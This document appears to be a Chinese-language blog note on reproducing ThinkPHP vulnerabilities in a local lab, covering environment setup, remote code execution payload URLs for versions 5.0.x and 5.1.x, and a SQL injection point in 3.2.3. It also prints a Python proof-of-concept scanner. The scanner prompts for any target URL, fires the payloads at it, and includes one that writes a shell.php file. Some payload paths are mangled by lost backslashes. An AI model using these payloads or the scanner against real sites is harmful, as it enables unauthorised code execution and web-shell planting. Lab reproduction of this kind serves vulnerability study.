Thinkphp5.0.x环境搭建
直接将源码解压就行,访问public目录即可,例如http://127.0.0.1/cms/thinkphp/public
Thinkphp5.0.x远程代码执行
Thinkphp5.1.x搭建方法和5.0.x一样
Payload:
http://127.0.0.1/cms/tp5.1/public/index.php?s=index/think equest/input?data[]=phpinfo()&filter=assert
http://127.0.0.1/cms/tp5.1/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
Python3 poc:
1 #coding:utf-8 2 import requests 3 headers = {'User-Agent':"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"} 4 def poc(target): 5 try: 6 poc = [r"/index.php?s=index/think equest/input?data[]=phpinfo()&filter=assert", 7 r"/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", 8 r"/index.php?s=index/ hink emplatedriverfile/write?cacheFile=shell.php&content=<?php%20phpinfo();?>", 9 r"/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()"] 10 for i in poc: 11 url = target + str(i) 12 html = requests.get(url,headers=headers) 13 if "<title>phpinfo()</title>" in html.text: 14 print("目标存在漏洞:"+url) 15 except: 16 pass 17 if __name__ == "__main__": 18 target = input("请输入目标url:") 19 poc(target)
Thinkphp3.2.3环境搭建
修改ApplicationCommonConfconfig.php配置文件,添加数据库配置信息。
这里不知道为什么声明编码的时候会出错,注释掉就正常了。
<?php
return array(
//'配置项'=>'配置值'
'DB_TYPE' => 'mysql',
'DB_HOST' => 'localhost',
'DB_NAME' => 'tp',
'DB_USER' => 'root',
'DB_PWD' => 'root',
'DB_PORT' => '3306',
'DB_FIELDS_CACHE' => true,
//'DB_CHARSET' => 'utf-8',
''
);
?>
然后在ApplicationHomeControllerIndexController.class.php 添加以下代码:
public function test()
{
$id = i('id');
$res = M('user')->find($id);
//$res = M('user')->delete($id);
//$res = M('user')->select($id);
}
注入点(代码能力有限,暂时不能对漏洞原理进行分析):
http://127.0.0.1/cms/thinkphp3.2.1/index.php?m=Home&c=Index&a=test&id[where]=1